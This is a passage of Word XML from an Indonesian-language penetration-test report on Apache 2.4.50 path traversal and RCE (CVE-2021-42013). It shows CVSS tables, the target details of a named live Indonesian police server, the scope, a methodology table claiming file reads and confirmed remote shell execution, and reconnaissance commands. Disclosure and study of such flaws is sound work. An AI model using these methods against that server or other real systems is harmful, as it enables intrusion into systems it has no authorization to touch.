      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3F6D8C40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982B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Attack Complexity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C85B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Low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8747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AC:L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8532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Tidak membutuhkan kondisi atau konfigurasi khusus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="458F1086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ADEA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Privileges Required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DA0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None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EC93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PR:N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2379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Tidak perlu login atau autentikasi apapun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="4C2CDD22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91DD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User Interaction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A9A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None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C7D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UI:N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A1C9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Tidak memerlukan aksi dari pengguna target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7D22896D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BE0D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Scope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BC42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Unchanged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84E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S:U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FBDC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Dampak terbatas pada komponen yang sama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3744BF18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59AA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Confidentiality Impact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962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9A98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C:H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C363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Seluruh data dapat terbaca, termasuk file sensitif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6AA6739C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1183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Integrity Impact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91F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B3B2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I:H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83EE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Data dan file dapat dimodifikasi atau dihapus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="4B22B9F9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D0DE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Availability Impact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7786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AA76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A:H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C047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Server dapat dilumpuhkan atau disalahgunakan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="192E931D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858E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Affected Versions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F4E7" wp14:textId="2240969D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2.4.49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2.4.50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p14:textId="4D5938EF"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5E38" wp14:textId="146CCD8B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Dua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versi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berturut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turut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,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keduanya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aktif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rentan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7906A855" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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79D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Fixed Version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DEF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2.4.51+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D8BB" wp14:textId="61667361"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685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Perbaikan komprehensif dirilis Oktober 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="60061E4C" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="09857176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2.1 Vector String CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="41D630F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CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="44EAFD9C" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="692CC578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2.2 Perbandingan Skor CVE Terkait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460"/>
        <w:gridCol w:w="1100"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="78DB6E7A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696F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CVE ID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F876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Versi Apache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CEA6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CVSS Score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EAF5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Jenis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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FD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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="0252D161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8313" wp14:textId="11F693AC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CVE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2021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41773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106B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2.4.49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09DB" wp14:textId="4F850436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7.5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High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71C2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Path Traversal + RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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8ED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Patched in 2.4.50 (tidak sempurna)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6B333683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1728" wp14:textId="024D52DF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CVE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2021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42013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875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2.4.50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9467" wp14:textId="36495703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9.8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Critical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ADBF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Path Traversal + RCE (bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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64CE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Patched in 2.4.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="69273DD6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CFA2" wp14:textId="61B9DB0B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CVE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2021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40438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F678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&lt; 2.4.48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7BCF" wp14:textId="3D4D191D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9.0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Critical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2CBD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SSRF via mod_proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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92D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Patched in 2.4.48</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="53A000CE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A768" wp14:textId="49E7D4E5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CVE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2022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22720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C49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&lt; 2.4.53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27F2" wp14:textId="3D4AB756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9.8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Critical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DD7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HTTP Request Smuggling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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963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Patched in 2.4.53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4B94D5A5" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19BCB3E6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3. Environment &amp; Target Scope</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="572A6ADB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3.1 Target System Information</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="76165EA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── Target Host ─────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2F1ECD5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Host         : dumaspresisi.itwasum.polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6F1850C5" wp14:textId="1536F74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IP Address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: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[Redacted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Responsible Disclosure]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="14B42B5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Port         : 8080 (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3DE0A53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Server       : Apache (via response Server header)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="60E7286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Version      : Apache HTTP Server 2.4.50</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="55A7A87F" wp14:textId="4FF7A13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OS      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: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Linux (CentOS/RHEL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inferred from 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etc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/passwd accounts)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="501981D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Architecture : x86_64 (confirmed via Ghidra binary analysis)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6F83198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Protocol     : HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1D8FA9B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CGI          : mod_cgi ENABLED (confirmed via RCE response)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2FDD482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Organization : Kepolisian Negara Republik Indonesia (POLRI)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1352FEB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Subdomain    : dumaspresisi.itwasum.polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="107606B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TLD          : .go.id (Indonesian Government domain)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3DEEC669" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6238C3F7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3.2 Research Environment</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="22DA397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── Attacker / Research Machine ────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5A18A75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OS           : Kali Linux Rolling (x86_64, kernel 5.15.x)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="60EE904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Browser      : Firefox ESR 78.0 (rv:78.0) / Gecko/20100101</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7E7F827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Proxy Tool   : Burp Suite Community Edition 2023.x</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2C8AFE0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Binary Tool  : Ghidra 10.3 (NSA Research Directorate)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="452B86F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Port Scanner : Nmap 7.93</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="04CE794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Network Caps : Wireshark 4.x / tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="06A1B15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HTTP Client  : curl 7.88.x</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="622D099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Date / Time  : Sun, 07 Jan 2024 15:26:34 GMT</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="649E90D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Timezone     : UTC+0</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3656B9AB" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73833BA0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3.3 Scope of Testing</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="033AFFB9" wp14:textId="74453123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scope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Host dumaspresisi.itwasum.polri.go.id:8080 dan endpoint HTTP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dapat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diakses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publik</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="116A7110" wp14:textId="4A98A3F0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scope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Analisis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statis biner Apache HTTP Server 2.4.50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menggunakan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Ghidra</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4945B992" wp14:textId="516EED99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Out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of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scope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Jaringan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internal POLRI,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sistem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lain di subnet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sama</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="53A7F8B3" wp14:textId="1D3CF1DB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Out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of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scope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Pengujian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destruktif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modifikasi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data,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atau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persistence</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="58496F49" wp14:textId="5152FBDB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Approach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Black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box testing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dengan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validasi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white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box via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analisis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Ghidra</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="45FB0818" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="79655B1B" wp14:textId="780C6E78">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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4. Methodology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Tahapan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Penelitian</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7141564C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Penelitian ini mengikuti metodologi standar industri yang mengacu pada PTES (Penetration Testing Execution Standard) dan OWASP Testing Guide v4.2. Setiap fase didokumentasikan secara cermat untuk memastikan reproducibility dan integritas temuan.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="049F31CB" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="87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860"/>
        <w:gridCol w:w="2800"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3304456C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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84C3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DA31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Nama Tahap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2801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Tools Digunakan</w:t>
            </w:r>
          </w:p>
        </w:tc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2AB2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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="339266EB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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089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Reconnaissance &amp; OSINT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C93B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Shodan, Censys, dig, whois, nslookup</w:t>
            </w:r>
          </w:p>
        </w:tc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98B8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Target profiling, subdomain map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="50F0CFA4" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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449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Port &amp; Service Scanning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A4E7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Nmap, curl, netcat</w:t>
            </w:r>
          </w:p>
        </w:tc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B70E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Open ports, service banner, OS fingerprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="2B9AE1C8" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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47FC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Vulnerability Assessment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CFFFFC7" w14:paraId="1EED2B89" wp14:textId="53A836C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CFFFFC7" w:rsidR="67455715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Confidential PwnTraverse</w:t>
            </w:r>
          </w:p>
        </w:tc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A95D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CVE confirmation, misconfig detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="30F6748F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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55F0" wp14:textId="6947C006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Exploitation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Path Traversal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26AF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curl, Burp Suite, Python script</w:t>
            </w:r>
          </w:p>
        </w:tc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F378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/etc/passwd, /etc/hosts, config files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3044C00F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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AEAD" wp14:textId="4E96D592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Exploitation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RCE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DB09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Burp Suite, curl, netcat</w:t>
            </w:r>
          </w:p>
        </w:tc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DE0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Remote shell execution confirmation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="58CFD3D6" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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1E22" wp14:textId="61554D89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Post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Exploitation Analysis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A8A8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id, uname, ps, netstat, cat, ls</w:t>
            </w:r>
          </w:p>
        </w:tc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DDC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Privilege level, running services, network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="02DDD44D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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3B9A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Binary Analysis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A39D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Ghidra 10.3</w:t>
            </w:r>
          </w:p>
        </w:tc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1F60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Root cause analysis, vulnerable function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="305F43EB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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AF9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Traffic Analysis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6290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Wireshark, tcpdump</w:t>
            </w:r>
          </w:p>
        </w:tc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EEC0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Packet capture, request patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="55A844BA" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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E30A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Detection Engineering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4684" wp14:textId="40E52790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YARA, Snort</w:t>
            </w:r>
          </w:p>
        </w:tc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3B55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Detection rules, IOC generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7E4203D9" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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C18A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Documentation &amp; Reporting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675D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Manual</w:t>
            </w:r>
          </w:p>
        </w:tc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460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This security journal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="53128261" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3731E463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5. Reconnaissance &amp; Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3ACD556E" wp14:textId="53D1381A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5.1 Passive Reconnaissance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 OSINT</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="32D8AC77" wp14:textId="7752E64F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Fase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awal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dimulai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dengan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pengumpulan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informasi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pasif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tanpa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mengirimkan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paket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langsung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target.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Sumber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sumber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publik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dimanfaatkan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membangun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profil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target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komprehensif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14FF253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DNS Lookup</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7FAC2AE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$ nslookup dumaspresisi.itwasum.polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="255186B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; &lt;&lt;&gt;&gt; DiG 9.18.x &lt;&lt;&gt;&gt; dumaspresisi.itwasum.polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="757D918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;; ANSWER SECTION:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="22260A1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dumaspresisi.itwasum.polri.go.id. 300 IN A [IP_REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="29D6B04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7132ACA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WHOIS Lookup</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4C64EC3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$ whois polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1AD5CDA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Domain Name: polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="12F45A0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Registrar  : PANDI (Pengelola Nama Domain Internet Indonesia)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="04EED56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Registrant : KEPOLISIAN NEGARA REPUBLIK INDONESIA</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7E70E6A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Status     : clientTransferProhibited</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62486C05" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B4998F0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5.2 Shodan / Censys Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6072C397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Mesin pencari Shodan dan Censys digunakan untuk mengidentifikasi layanan yang terekspos secara publik dan versi software tanpa melakukan koneksi langsung ke target.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F884EF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Shodan Search Query</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="54454CD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org:"Kepolisian Negara Republik Indonesia" port:8080 apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A6959E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530A50B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Hasil representatif dari Shodan:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1563CEC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IP          : [REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6AF058A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Port        : 8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="44C4B3D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Product     : Apache httpd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="36C5FE1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Version     : 2.4.50</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4017252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OS          : Linux</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="21D08AC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CPE         : cpe:/a:apache:http_server:2.4.50</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="58920A84" wp14:textId="4CA287FC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Last Seen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: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2024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07</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="100C5B5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5E91EFF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Informasi ini mengkonfirmasi versi rentan sebelum pengujian aktif</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4101652C" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="70F3DA4F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5.3 HTTP Banner Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="07A42298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Pengambilan banner HTTP dilakukan menggunakan curl untuk mengkonfirmasi versi server dan mengidentifikasi header keamanan yang ada atau tidak ada.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="285F1DA5" wp14:textId="1F24B5A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$ curl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I http://dumaspresisi.itwasum.polri.go.id:8080/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="12F40E8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183219BC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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2D96117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Date: Sun, 07 Jan 2024 15:20:01 GMT</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="326866F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Server: Apache                      ← Versi disembunyikan (ServerTokens Prod)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7E8A801B" wp14:textId="49CAA51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Powered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By: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tidak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ada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)           ← Tidak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terekspos</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2BF46CD4" wp14:textId="0B4C8452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Type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Options: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tidak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ada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) ← MISSING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misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="72D944DF" wp14:textId="0A0B167C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Frame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Options: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tidak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ada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)        ← MISSING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clickjacking risk</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="61C07013" wp14:textId="2546FCA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Security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Policy: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tidak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ada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)← MISSING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XSS risk</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0FA74E76" wp14:textId="14E31D50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Strict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Transport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Security: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tidak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ada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)← MISSING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no HTTPS enforcement</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1A57B6C4" wp14:textId="66FDFFB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Connection: Keep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Alive</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="656A9838" wp14:textId="52B6BE2A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Type: text/html; charset=UTF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8</w:t>
      </w:r>
    </w:p>
